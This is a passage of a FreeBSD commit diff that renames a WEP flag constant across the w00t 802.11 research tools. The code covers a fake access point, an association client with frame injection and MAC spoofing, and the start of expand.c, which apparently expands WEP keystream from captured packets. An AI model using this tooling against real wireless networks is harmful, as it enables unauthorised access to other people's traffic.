memcpy(wh->i_seq, seq, sizeof(seq)); } void read_real_data(struct params *p, struct ieee80211_frame *wh, int len) { char dst[6]; int rc; char *ptr = (char*) (wh+1); /* stuff not for this net */ if (memcmp(wh->i_addr1, p->mac, 6) != 0) return; /* relay data */ if (memcmp(wh->i_addr3, p->mac, 6) != 0) relay_data(p, wh, len); memcpy(dst, wh->i_addr3, 6); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { if (!p->wep_len) { printf("Got wep but i aint wep\n"); return; } if (wep_decrypt(wh, len, p->wep_key, p->wep_len) == -1){ printf("Can't decrypt\n"); return; } ptr += 4; len -= 8; } /* ether header */ ptr += 8 - 2; ptr -= 6; memcpy(ptr, wh->i_addr2, 6); ptr -= 6; memcpy(ptr, dst, 6); len -= sizeof(*wh); len -= 8; len += 14; /* send to tap */ rc = write(p->tap, ptr, len); if (rc == -1) err(1, "write()"); if (rc != len) { printf("Wrote %d/%d\n", rc, len); exit(1); } } void read_data(struct params *p, struct ieee80211_frame *wh, int len) { switch (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) { case IEEE80211_FC0_SUBTYPE_DATA: read_real_data(p, wh, len); break; case IEEE80211_FC0_SUBTYPE_NODATA: break; default: printf("wtf %d\n", (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) >> IEEE80211_FC0_SUBTYPE_SHIFT); abort(); break; } } struct client* client_find(struct params *p, char *mac) { struct client* c = p->clients; while (c) { if (memcmp(c->mac, mac, 6) == 0) return c; c = c->next; } return NULL; } void client_insert(struct params *p, struct client *c) { #if 1 do { char mac[6*3]; mac2str(mac, c->mac); printf("Adding client %s\n", mac); } while(0); #endif c->next = p->clients; p->clients = c; } int duplicate(struct params *p, struct ieee80211_frame *wh, int rc) { struct client *c; int s; if (!frame_type(wh, IEEE80211_FC0_TYPE_DATA, IEEE80211_FC0_SUBTYPE_DATA)) return 0; s = seqno(wh); c = client_find(p, wh->i_addr2); if (!c) { c = malloc(sizeof(*c)); if (!c) err(1, "malloc()"); memset(c, 0, sizeof(*c)); memcpy(c->mac, wh->i_addr2, 6); c->seq = s-1; client_insert(p, c); } if (wh->i_fc[1] & IEEE80211_FC1_RETRY) { if ( (s <= c->seq) && ((c->seq - s ) < 5)) { #if 0 printf("Dup seq %d prev %d\n", s, c->seq); #endif return 1; } } #if 0 do { char mac[3*6]; mac2str(mac, c->mac); printf("%s seq %d prev %d\n", mac, s, c->seq); } while (0); #endif c->seq = s; return 0; } void ack(struct params *p, struct ieee80211_frame *wh) { if (memcmp(wh->i_addr1, p->mac, 6) != 0) return; if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_CTL) return; send_ack(p->tx, wh->i_addr2); } void read_wifi(struct params *p) { char buf[4096]; int rc; struct ieee80211_frame *wh; rc = sniff(p->rx, buf, sizeof(buf)); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return; /* filter my own shit */ if (memcmp(wh->i_addr2, p->mac, 6) == 0) { /* XXX CTL frames */ if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) != IEEE80211_FC0_TYPE_CTL) return; } #if 1 ack(p, wh); #endif if (duplicate(p, wh, rc)) { #if 0 printf("Dup\n"); #endif return; } switch (wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) { case IEEE80211_FC0_TYPE_MGT: read_mgt(p, wh, rc); break; case IEEE80211_FC0_TYPE_CTL: read_ctl(p, wh, rc); break; case IEEE80211_FC0_TYPE_DATA: read_data(p, wh, rc); break; default: printf("wtf\n"); abort(); break; } } void read_tap(struct params *p) { char buf[4096]; char *ptr; int len = sizeof(buf); int offset; char src[6], dst[6]; struct ieee80211_frame *wh; int rd; ptr = buf; offset = sizeof(struct ieee80211_frame) + 8 - 14; if (p->wep_len) offset += 4; ptr += offset; len -= offset; /* read packet */ memset(buf, 0, sizeof(buf)); rd = read(p->tap, ptr, len); if (rd == -1) err(1, "read()"); /* 802.11 header */ wh = (struct ieee80211_frame*) buf; memcpy(dst, ptr, sizeof(dst)); memcpy(src, ptr+6, sizeof(src)); fill_basic(wh, p); memcpy(wh->i_addr3, src, sizeof(wh->i_addr3)); memcpy(wh->i_addr1, dst, sizeof(wh->i_addr1)); wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; wh->i_fc[1] |= IEEE80211_FC1_DIR_FROMDS; if (p->wep_len) - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; /* LLC & SNAP */ ptr = (char*) (wh+1); if (p->wep_len) ptr += 4; *ptr++ = 0xAA; *ptr++ = 0xAA; *ptr++ = 0x03; *ptr++ = 0x00; *ptr++ = 0x00; *ptr++ = 0x00; /* ether type overlaps w00t */ rd += offset; /* WEP */ if (p->wep_len) { ptr = (char*) (wh+1); memcpy(ptr, &p->wep_iv, 3); ptr[3] = 0; p->wep_iv++; wep_encrypt(wh, rd, p->wep_key, p->wep_len); rd += 4; /* ICV */ } send_frame(p, wh, rd); } int retransmit(struct params *p) { #if 0 printf("RETRANS %d\n", p->packet_try); #endif send_frame(p, p->packet, p->packet_len); p->packet_try++; if (p->packet_try > 3) p->packet_try = 0; else { if (gettimeofday(&p->plast, NULL) == -1) err(1, "gettimeofday()"); } return p->packet_try; } void next_event(struct params *p) { struct timeval to, now; int el; int max; fd_set fds; int rtr = 3*1000; /* figure out select timeout */ if (gettimeofday(&now, NULL) == -1) err(1, "gettimeofday()"); /* check beacon timeout */ el = elapsed(&p->blast, &now); if (el >= p->bint) { send_beacon(p); el = 0; } el = p->bint - el; to.tv_sec = el/1000/1000; to.tv_usec = el - to.tv_sec*1000*1000; /* check tx timeout */ if (p->packet_try) { el = elapsed(&p->plast, &now); if (el >= rtr) { /* check if we gotta retransmit more */ if (retransmit(p)) { el = 0; } else el = -1; } /* gotta retransmit in future */ if (el != -1) { el = rtr - el; if ((to.tv_sec*1000*1000 + to.tv_usec) > el) { to.tv_sec = el/1000/1000; to.tv_usec = el - to.tv_sec*1000*1000; } } } /* select */ FD_ZERO(&fds); FD_SET(p->rx, &fds); FD_SET(p->tap, &fds); max = p->rx > p->tap ? p->rx : p->tap; if (select(max+1, &fds, NULL, NULL, &to) == -1) err(1, "select()"); if (FD_ISSET(p->tap, &fds)) read_tap(p); if (FD_ISSET(p->rx, &fds)) read_wifi(p); } int main(int argc, char *argv[]) { char *iface = "wlan0"; char *tap = "tap0"; struct params p; int ch; /* default params */ memset(&p, 0, sizeof(p)); memcpy(p.mac, "\x00\x00\xde\xfa\xce\x0d", 6); strcpy(p.ssid, "sorbo"); p.bint = 500*1000; p.seq = getpid(); if (gettimeofday(&p.blast, NULL) == -1) err(1, "gettimeofday()"); p.chan = 3; while ((ch = getopt(argc, argv, "hi:s:m:w:c:t:")) != -1) { switch (ch) { case 'i': iface = optarg; break; case 't': tap = optarg; break; case 'c': p.chan = atoi(optarg); break; case 's': strncpy(p.ssid, optarg, sizeof(p.ssid)-1); p.ssid[sizeof(p.ssid)-1] = 0; break; case 'm': str2mac(p.mac, optarg); break; case 'w': if (str2wep(p.wep_key, &p.wep_len, optarg)) { printf("Error parsing WEP key\n"); exit(1); } break; case 'h': default: usage(argv[0]); break; } } /* init */ if ((p.tx = open_tx(iface)) == -1) err(1, "open_tx()"); if ((p.rx = open_rx(iface)) == -1) err(1, "open_rx()"); if ((p.tap = open_tap(tap)) == -1) err(1, "open_tap()"); if (set_iface_mac(tap, p.mac) == -1) err(1, "set_iface_mac()"); while (1) { next_event(&p); } exit(0); } diff --git a/tools/tools/net80211/w00t/assoc/assoc.c b/tools/tools/net80211/w00t/assoc/assoc.c index 79aaef681881..345c31570474 100644 --- a/tools/tools/net80211/w00t/assoc/assoc.c +++ b/tools/tools/net80211/w00t/assoc/assoc.c @@ -1,938 +1,938 @@ /*- * Copyright (c) 2006, Andrea Bittau * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $FreeBSD$ */ #include #include #include #include #include #include #include #include #include #include "w00t.h" enum { S_START = 0, S_SEND_PROBE_REQ, S_WAIT_PROBE_RES, S_SEND_AUTH, S_WAIT_AUTH, S_SEND_ASSOC, S_WAIT_ASSOC, S_ASSOCIATED, S_SEND_DATA, S_WAIT_ACK }; struct params { int seq; int seq_rx; char *mac; char *ssid; char bssid[6]; char ap[6]; int tx; int rx; int tap; int aid; char packet[4096]; int packet_len; int state; char wep_key[13]; int wep_iv; int wep_len; }; void usage(char *pname) { printf("Usage: %s \n" "-m\t\n" "-s\t\n" "-h\tusage\n" "-i\t\n" "-w\t\n" "-t\t\n" "-b\t\n" , pname); exit(0); } void fill_basic(struct ieee80211_frame *wh, struct params *p) { short *seq; wh->i_dur[0] = 0x69; wh->i_dur[1] = 0x00; memcpy(wh->i_addr1, p->ap, 6); memcpy(wh->i_addr2, p->mac, 6); memcpy(wh->i_addr3, p->bssid, 6); seq = (short*)wh->i_seq; *seq = seqfn(p->seq, 0); } void send_frame(struct params *p, void *buf, int len) { int rc; rc = inject(p->tx, buf, len); if (rc == -1) { if (errno == EMSGSIZE) warnx("inject(len %d)", len); else err(1, "inject(len %d)", len); } else if (rc != len) errx(1, "injected %d but only %d sent", rc, len); p->seq++; } void send_probe_request(struct params *p) { char buf[2048]; struct ieee80211_frame *wh; char *data; int len; memset(buf, 0, sizeof(buf)); wh = (struct ieee80211_frame*) buf; fill_basic(wh, p); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_REQ; memset(wh->i_addr1, 0xFF, 6); memset(wh->i_addr3, 0xFF, 6); data = (char*) (wh + 1); *data++ = 0; /* SSID */ *data++ = strlen(p->ssid); strcpy(data, p->ssid); data += strlen(p->ssid); *data++ = 1; /* rates */ *data++ = 4; *data++ = 2 | 0x80; *data++ = 4 | 0x80; *data++ = 11; *data++ = 22; len = data - (char*)wh; send_frame(p, buf, len); } void send_auth(struct params *p) { char buf[2048]; struct ieee80211_frame *wh; char *data; int len; memset(buf, 0, sizeof(buf)); wh = (struct ieee80211_frame*) buf; fill_basic(wh, p); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_AUTH; data = (char*) (wh + 1); /* algo */ *data++ = 0; *data++ = 0; /* transaction no. */ *data++ = 1; *data++ = 0; /* status code */ *data++ = 0; *data++ = 0; len = data - (char*)wh; send_frame(p, buf, len); } /* * Add an ssid element to a frame. */ static u_int8_t * ieee80211_add_ssid(u_int8_t *frm, const u_int8_t *ssid, u_int len) { *frm++ = IEEE80211_ELEMID_SSID; *frm++ = len; memcpy(frm, ssid, len); return frm + len; } void send_assoc(struct params *p) { union { struct ieee80211_frame w; char buf[2048]; } u; struct ieee80211_frame *wh; char *data; int len, capinfo, lintval; memset(&u, 0, sizeof(u)); wh = (struct ieee80211_frame*) &u.w; fill_basic(wh, p); wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_ASSOC_REQ; data = (char*) (wh + 1); /* capability */ capinfo = IEEE80211_CAPINFO_ESS; if (p->wep_len) capinfo |= IEEE80211_CAPINFO_PRIVACY; *(uint16_t *)data = htole16(capinfo); data += 2; /* listen interval */ *(uint16_t *)data = htole16(100); data += 2; data = ieee80211_add_ssid(data, p->ssid, strlen(p->ssid)); *data++ = 1; /* rates */ *data++ = 4; *data++ = 2 | 0x80; *data++ = 4 | 0x80; *data++ = 11; *data++ = 22; len = data - (char*)wh; send_frame(p, u.buf, len); } int for_me(struct ieee80211_frame *wh, char *mac) { return memcmp(wh->i_addr1, mac, 6) == 0; } int from_ap(struct ieee80211_frame *wh, char *mac) { return memcmp(wh->i_addr2, mac, 6) == 0; } void ack(struct params *p, struct ieee80211_frame *wh) { if (memcmp(wh->i_addr1, p->mac, 6) != 0) return; if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_CTL) return; send_ack(p->tx, wh->i_addr2); } void generic_process(struct ieee80211_frame *wh, struct params *p, int len) { int type, stype; int dup = 0; #if 0 ack(p, wh); #endif #if 0 if (!for_me(wh, p->mac)) return; #endif /* ignore my own shit */ if (memcmp(wh->i_addr2, p->mac, 6) == 0) { return; } type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; if (for_me(wh, p->mac) && type == IEEE80211_FC0_TYPE_DATA) { /* sequence number & dups */ if (p->seq_rx == -1) p->seq_rx = seqno(wh); else { int s = seqno(wh); if (s > p->seq_rx) { /* normal case */ if (p->seq_rx + 1 == s) { #if 0 printf("S=%d\n", s); #endif p->seq_rx = s; } else { /* future */ #if 0 printf("Got seq %d, prev %d\n", s, p->seq_rx); #endif p->seq_rx = s; } } else { /* we got pas stuff... */ if (p->seq_rx - s > 1000) { #if 0 printf("Seqno wrap seq %d, last %d\n", s, p->seq_rx); #endif /* seqno wrapping ? */ p->seq_rx = 0; } else { /* dup */ dup = 1; #if 0 printf("Got dup seq %d, last %d\n", s, p->seq_rx); #endif } } } } #if 0 if (wh->i_fc[1] & IEEE80211_FC1_RETRY) { printf("Got retry\n"); } #endif #if 0 if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) != IEEE80211_FC0_TYPE_CTL) { int rc = send_ack(p->tx, wh->i_addr2); if (rc == -1) err(1, "send_ack()"); if (rc != 10) { printf("Wrote ACK %d/%d\n", rc, 10); exit(1); } } #endif /* data frames */ if (type == IEEE80211_FC0_TYPE_DATA && !dup) { char *ptr; char src[6], dst[6]; int rc; if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) { if (memcmp(wh->i_addr2, p->ap, 6) != 0) return; } else { if (memcmp(wh->i_addr1, p->ap, 6) != 0) return; } if (p->state < S_ASSOCIATED) { printf("Got data when not associated!\n"); return; } if (stype != IEEE80211_FC0_SUBTYPE_DATA) { printf("Got weird data frame stype=%d\n", stype >> IEEE80211_FC0_SUBTYPE_SHIFT); return; } if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) { memcpy(src, wh->i_addr3, 6); memcpy(dst, wh->i_addr1, 6); } else { memcpy(src, wh->i_addr2, 6); memcpy(dst, wh->i_addr3, 6); } ptr = (char*) (wh + 1); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { if (!p->wep_len) { char srca[3*6]; char dsta[3*6]; mac2str(srca, src); mac2str(dsta, dst); printf("Got wep but i aint wep %s->%s %d\n", srca, dsta, len-sizeof(*wh)-8); return; } if (wep_decrypt(wh, len, p->wep_key, p->wep_len) == -1){ char srca[3*6]; char dsta[3*6]; mac2str(srca, src); mac2str(dsta, dst); printf("Can't decrypt %s->%s %d\n", srca, dsta, len-sizeof(*wh)-8); return; } ptr += 4; len -= 8; } /* ether header */ ptr += 8 - 2; ptr -= 6; memcpy(ptr, src, 6); ptr -= 6; memcpy(ptr, dst, 6); len -= sizeof(*wh); len -= 8; len += 14; /* send to tap */ rc = write(p->tap, ptr, len); if (rc == -1) err(1, "write()"); if (rc != len) { printf("Wrote %d/%d\n", rc, len); exit(1); } } } int get_probe_response(struct params *p) { char buf[4096]; int rc; struct ieee80211_frame *wh; char *data; int ess; int wep; char *ssid; char from[18]; char bssid[18]; rc = sniff(p->rx, buf, sizeof(buf)); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return 0; generic_process(wh, p, rc); if (!for_me(wh, p->mac)) return 0; if (!frame_type(wh, IEEE80211_FC0_TYPE_MGT, IEEE80211_FC0_SUBTYPE_PROBE_RESP)) return 0; data = (char*) (wh+1); data += 8; /* Timestamp */ data += 2; /* Beacon Interval */ ess = *data & 1; wep = (*data & IEEE80211_CAPINFO_PRIVACY) ? 1 : 0; data += 2; /* capability */ /* ssid */ if (*data != 0) { printf("Warning, expecting SSID got %x\n", *data); return 0; } data++; ssid = data+1; data += 1 + *data; if (*data != 1) { printf("Warning, expected rates got %x\n", *data); return 0; } *data = 0; /* rates */ data++; mac2str(from, wh->i_addr2); mac2str(bssid, wh->i_addr3); printf("Got response from %s [%s] [%s] ESS=%d WEP=%d\n", from, bssid, ssid, ess, wep); if (strcmp(ssid, p->ssid) != 0) return 0; memcpy(p->ap, wh->i_addr2, 6); memcpy(p->bssid, wh->i_addr3, 6); return 1; } int get_auth(struct params *p) { char buf[4096]; int rc; struct ieee80211_frame *wh; short *data; rc = sniff(p->rx, buf, sizeof(buf)); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return 0; generic_process(wh, p, rc); if (!for_me(wh, p->mac)) return 0; if (!from_ap(wh, p->ap)) return 0; if (!frame_type(wh, IEEE80211_FC0_TYPE_MGT, IEEE80211_FC0_SUBTYPE_AUTH)) return 0; data = (short*) (wh+1); /* algo */ if (le16toh(*data) != 0) { printf("Not open-system %d!\n", le16toh(*data)); return 0; } data++; /* transaction no. */ if (le16toh(*data) != 2) { printf("Got transaction %d!\n", le16toh(*data)); return 0; } data++; /* status code */ rc = le16toh(*data); if (rc == 0) { printf("Authenticated\n"); return 1; } printf("Authentication failed code=%d\n", rc); return 0; } int get_assoc(struct params *p) { char buf[4096]; int rc; struct ieee80211_frame *wh; unsigned short *data; rc = sniff(p->rx, buf, sizeof(buf)); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return 0; generic_process(wh, p, rc); if (!for_me(wh, p->mac)) return 0; if (!from_ap(wh, p->ap)) return 0; if (!frame_type(wh, IEEE80211_FC0_TYPE_MGT, IEEE80211_FC0_SUBTYPE_ASSOC_RESP)) return 0; data = (unsigned short*) (wh+1); data++; /* caps */ /* status */ rc = le16toh(*data++); if (rc != 0) { printf("Assoc failed code %d\n", rc); return 0; } /* aid */ p->aid = le16toh(*data & ~( (1 << 15) | (1 << 14))); printf("Association ID=%d\n", p->aid); return 1; } void read_wifi(struct params *p) { char buf[4096]; int rc; struct ieee80211_frame *wh; int type, stype; rc = sniff(p->rx, buf, sizeof(buf)); if (rc == -1) err(1, "sniff()"); wh = get_wifi(buf, &rc); if (!wh) return; generic_process(wh, p, rc); if (!for_me(wh, p->mac)) return; type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK; /* control frames */ if (type == IEEE80211_FC0_TYPE_CTL) { switch (stype) { case IEEE80211_FC0_SUBTYPE_ACK: if (p->state == S_WAIT_ACK) p->state = S_ASSOCIATED; break; case IEEE80211_FC0_SUBTYPE_RTS: #if 0 printf("Got RTS\n"); #endif break; default: printf("Unknown CTL frame %d\n", stype >> IEEE80211_FC0_SUBTYPE_SHIFT); abort(); break; } return; } if (!from_ap(wh, p->ap)) return; if (type != IEEE80211_FC0_TYPE_MGT) return; if (stype == IEEE80211_FC0_SUBTYPE_DEAUTH || stype == IEEE80211_FC0_SUBTYPE_DISASSOC) { printf("Got management! %d\n", stype >> IEEE80211_FC0_SUBTYPE_SHIFT); p->seq_rx = -1; p->state = S_START; } return; } void read_tap(struct params *p) { char *ptr; int len = sizeof(p->packet); int offset; char mac[6]; struct ieee80211_frame *wh; ptr = p->packet; offset = sizeof(struct ieee80211_frame) + 8 - 14; if (p->wep_len) offset += 4; ptr += offset; len -= offset; /* read packet */ memset(p->packet, 0, sizeof(p->packet)); p->packet_len = read(p->tap, ptr, len); if (p->packet_len == -1) err(1, "read()"); /* 802.11 header */ wh = (struct ieee80211_frame*) p->packet; memcpy(mac, ptr, sizeof(mac)); fill_basic(wh, p); memcpy(wh->i_addr3, mac, sizeof(wh->i_addr3)); wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA; wh->i_fc[1] |= IEEE80211_FC1_DIR_TODS; if (p->wep_len) - wh->i_fc[1] |= IEEE80211_FC1_WEP; + wh->i_fc[1] |= IEEE80211_FC1_PROTECTED; /* LLC & SNAP */ ptr = (char*) (wh+1); if (p->wep_len) ptr += 4; *ptr++ = 0xAA; *ptr++ = 0xAA; *ptr++ = 0x03; *ptr++ = 0x00; *ptr++ = 0x00; *ptr++ = 0x00; /* ether type overlaps w00t */ p->packet_len += offset; /* WEP */ if (p->wep_len) { ptr = (char*) (wh+1); memcpy(ptr, &p->wep_iv, 3); ptr[3] = 0; p->wep_iv++; wep_encrypt(wh, p->packet_len, p->wep_key, p->wep_len); p->packet_len += 4; /* ICV */ } } int main(int argc, char *argv[]) { char* ssid = 0; char mac[] = { 0x00, 0x00, 0xde, 0xfa, 0xce, 0xd }; int ch; struct params p; char *iface = "wlan0"; char *tap = "tap0"; int timeout = 50*1000; struct timeval start; memset(&p, 0, sizeof(p)); p.wep_len = 0; p.wep_iv = 0; p.state = S_START; while ((ch = getopt(argc, argv, "hm:s:i:w:t:b:")) != -1) { switch (ch) { case 'b': if (str2mac(p.bssid, optarg)) { printf("Error parsing BSSID\n"); exit(1); } memcpy(p.ap, p.bssid, sizeof(p.ap)); p.state = S_SEND_AUTH; break; case 's': ssid = optarg; break; case 'm': if (str2mac(mac, optarg)) { printf("Error parsing MAC\n"); exit(1); } break; case 'i': iface = optarg; break; case 'w': if (str2wep(p.wep_key, &p.wep_len, optarg)) { printf("Error parsing WEP key\n"); exit(1); } break; case 't': tap = optarg; break; case 'h': default: usage(argv[0]); break; } } if (!ssid) usage(argv[0]); p.mac = mac; p.ssid = ssid; p.seq = getpid(); p.seq_rx = -1; if (open_rxtx(iface, &p.rx, &p.tx) == -1) err(1, "open_rxtx()"); p.tap = open_tap(tap); if (p.tap == -1) err(1, "open_tap()"); if (set_iface_mac(tap, mac) == -1) err(1, "set_iface_mac()"); while (1) { /* check for timeouts */ switch (p.state) { case S_WAIT_PROBE_RES: case S_WAIT_AUTH: case S_WAIT_ASSOC: case S_WAIT_ACK: do { int rc; struct timeval tv; int elapsed = 0; /* check timeout */ if (gettimeofday(&tv, NULL) == -1) err(1, "gettimeofday()"); elapsed = tv.tv_sec - start.tv_sec; if (elapsed == 0) { elapsed = tv.tv_usec - start.tv_usec; } else { elapsed *= (elapsed-1)*1000*1000; elapsed += 1000*1000 - start.tv_usec; elapsed += tv.tv_usec; } if (elapsed >= timeout) rc = 0; else { fd_set fds; FD_ZERO(&fds); FD_SET(p.rx, &fds); elapsed = timeout - elapsed; tv.tv_sec = elapsed/1000/1000; elapsed -= tv.tv_sec*1000*1000; tv.tv_usec = elapsed; rc = select(p.rx+1, &fds, NULL, NULL, &tv); if (rc == -1) err(1, "select()"); } /* timeout */ if (!rc) { #if 0 printf("Timeout\n"); #endif p.state--; } } while(0); break; } switch (p.state) { case S_START: p.state = S_SEND_PROBE_REQ; break; case S_SEND_PROBE_REQ: printf("Sending probe request for %s\n", ssid); send_probe_request(&p); p.state = S_WAIT_PROBE_RES; if (gettimeofday(&start, NULL) == -1) err(1, "gettimeofday()"); break; case S_WAIT_PROBE_RES: if (get_probe_response(&p)) { p.state = S_SEND_AUTH; } break; case S_SEND_AUTH: do { char apmac[18]; mac2str(apmac, p.ap); printf("Sending auth to %s\n", apmac); send_auth(&p); p.state = S_WAIT_AUTH; if (gettimeofday(&start, NULL) == -1) err(1, "gettimeofday()"); } while(0); break; case S_WAIT_AUTH: if (get_auth(&p)) { p.state = S_SEND_ASSOC; } break; case S_SEND_ASSOC: printf("Sending assoc\n"); send_assoc(&p); p.state = S_WAIT_ASSOC; if (gettimeofday(&start, NULL) == -1) err(1, "gettimeofday()"); break; case S_WAIT_ASSOC: if (get_assoc(&p)) { printf("Associated\n"); p.state = S_ASSOCIATED; } break; case S_ASSOCIATED: do { fd_set fds; int max; FD_ZERO(&fds); FD_SET(p.rx, &fds); FD_SET(p.tap, &fds); max = (p.rx > p.tap) ? p.rx : p.tap; max = select(max+1, &fds, NULL, NULL, NULL); if (max == -1) err(1, "select()"); if (FD_ISSET(p.tap, &fds)) { read_tap(&p); p.state = S_SEND_DATA; } if (FD_ISSET(p.rx, &fds)) { read_wifi(&p); } } while(0); break; case S_SEND_DATA: send_frame(&p, p.packet, p.packet_len); do { struct ieee80211_frame *wh; wh = (struct ieee80211_frame*) p.packet; wh->i_fc[1] |= IEEE80211_FC1_RETRY; } while (0); p.state = S_WAIT_ACK; if (gettimeofday(&start, NULL) == -1) err(1, "gettimeofday()"); break; case S_WAIT_ACK: read_wifi(&p); break; default: printf("Unknown state %d\n", p.state); abort(); break; } } exit(0); } diff --git a/tools/tools/net80211/w00t/expand/expand.c b/tools/tools/net80211/w00t/expand/expand.c index f2827d9b5245..64bff9990cbc 100644 --- a/tools/tools/net80211/w00t/expand/expand.c +++ b/tools/tools/net80211/w00t/expand/expand.c @@ -1,468 +1,468 @@ /*- * Copyright (c) 2006, Andrea Bittau * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * $FreeBSD$ */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "w00t.h" enum { S_START = 0, S_WAIT_RELAY, }; struct queue { struct ieee80211_frame *wh; int len; char *buf; int live; struct queue *next; }; struct params { int rx; int tx; int tap; char mcast[5]; char mac[6]; char ap[6]; char prga[2048]; int prga_len; int state; struct queue *q; char packet[2048]; int packet_len; struct timeval last; int seq; unsigned char guess; }; int wanted(struct params *p, struct ieee80211_frame *wh, int len) { char *bssid, *sa; if (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) { bssid = wh->i_addr1; sa = wh->i_addr2; } else { bssid = wh->i_addr2; sa = wh->i_addr3; } if (memcmp(bssid, p->ap, 6) != 0) return 0; - if (!(wh->i_fc[1] & IEEE80211_FC1_WEP)) { + if (!(wh->i_fc[1] & IEEE80211_FC1_PROTECTED)) { printf("Got non WEP packet...\n"); return 0; } /* my own shit */ if (memcmp(p->mac, sa, 6) == 0) return 0; return 1; } void enque(struct params *p, char **buf, struct ieee80211_frame *wh, int len) { struct queue *q = p->q; int qlen = 0; char *ret = NULL; struct queue *last = NULL; /* find a slot */ while (q) { if (q->live) qlen++; else { /* recycle */ ret = q->buf; break; } last = q; q = q->next; } /* need to create slot */ if (!q) { q = (struct queue*) malloc(sizeof(*q)); if (!q) err(1, "malloc()"); memset(q, 0, sizeof(*q)); /* insert */ if (!p->q) p->q = q; else { assert(last); last->next = q; } } q->live = 1; q->buf = *buf; q->len = len; q->wh = wh; qlen++; if (qlen > 5) printf("Enque. Size: %d\n", qlen); *buf = ret; } void send_packet(struct params *p) { int rc; rc = inject(p->tx, p->packet, p->packet_len); if (rc == -1) err(1, "inject()"); if (rc != p->packet_len) { printf("Wrote %d/%d\n", rc, p->packet_len); exit(1); } if (gettimeofday(&p->last, NULL) == -1) err(1, "gettimeofday()"); } #include void send_mcast(struct params *p, unsigned char x) { struct ieee80211_frame *wh; short *seq; struct queue *q = p->q; char *data, *ptr; int len; uLong crc = crc32(0L, Z_NULL, 0); uLong *pcrc; int i; int need_frag = 0; char payload[10] = "\xAA\xAA\x03\x00\x00\x00\x08\x06\x00\x00"; assert(q); /* 802.11 */ memset(p->packet, 0, sizeof(p->packet)); wh = (struct ieee80211_frame*) p->packet; 